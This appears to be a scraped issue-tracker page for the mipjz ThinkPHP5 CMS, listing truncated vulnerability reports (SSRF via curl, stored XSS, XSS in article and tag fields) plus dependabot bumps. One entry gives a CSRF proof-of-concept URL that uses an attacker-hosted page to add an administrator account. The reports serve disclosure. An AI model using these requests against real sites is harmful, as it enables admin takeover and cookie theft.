mipjz
mipjz copied to clipboard
sansanyun
thinkphp5
Vulnerability location:`app/setting/controller/ApiAdminDomainSettings.php`:  The problem arises in line 28——39: ```php $ch = curl_init(); $options = array( CURLOPT_URL => $api, CURLOPT_POST => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_POSTFIELDS => implode("\n", $urls), CURLOPT_HTTPHEADER...
Bumps [symfony/http-foundation](https://github.com/symfony/http-foundation) from 4.3.2 to 4.4.1. Changelog *Sourced from [symfony/http-foundation's changelog](https://github.com/symfony/http-foundation/blob/master/CHANGELOG.md).* > CHANGELOG > ========= > > 5.1.0 > ----- > > * Deprecate `Response::create()`, `JsonResponse::create()`, > `RedirectResponse::create()`, and `StreamedResponse::create()`...
![dependabot[bot] avatar](https://avatars.githubusercontent.com/in/29110?v=4 "dependabot[bot] avatar"){kind=avatar}
Bumps [symfony/mime](https://github.com/symfony/mime) from 4.3.2 to 4.4.1. Changelog *Sourced from [symfony/mime's changelog](https://github.com/symfony/mime/blob/master/CHANGELOG.md).* > CHANGELOG > ========= > > 4.4.0 > ----- > > * [BC BREAK] Removed `NamedAddress` (`Address` now supports...
This is a stored XSS which allows attacker to insert javascript code into database. When user see the message, attacker is able to steal user's cookie. **Filename** /app/widget/controller/ApiAdminWidgetPages.php **Code** ```php...
### After the administrator logs in, accessing the following two links can add an administrator user **Poc address**:https://github.com/sp1d3r/swf_json_csrf 1、**Add a user:** http://[Attack domain]/read.html?jsonData={%22groupId%22:1,%22username%22:%22admin123%22,%22password%22:%220192023a7bbd73250516f069df18b500%22,%22rpassword%22:%220192023a7bbd73250516f069df18b500%22}&php_url=http://[Attack domain]/test.php&endpoint=http://[Target domain]/index.php?s=/user/ApiAdminUser/itemAdd 2、**Promote user privileges to administrator...
[Vulnerability Description] Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd. [Vulnerability Type] Cross Site Scripting (XSS) [Vendor...
[Vulnerability Description] Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the tag category name field from categoryAdd. [Vulnerability Type] Cross Site Scripting (XSS)...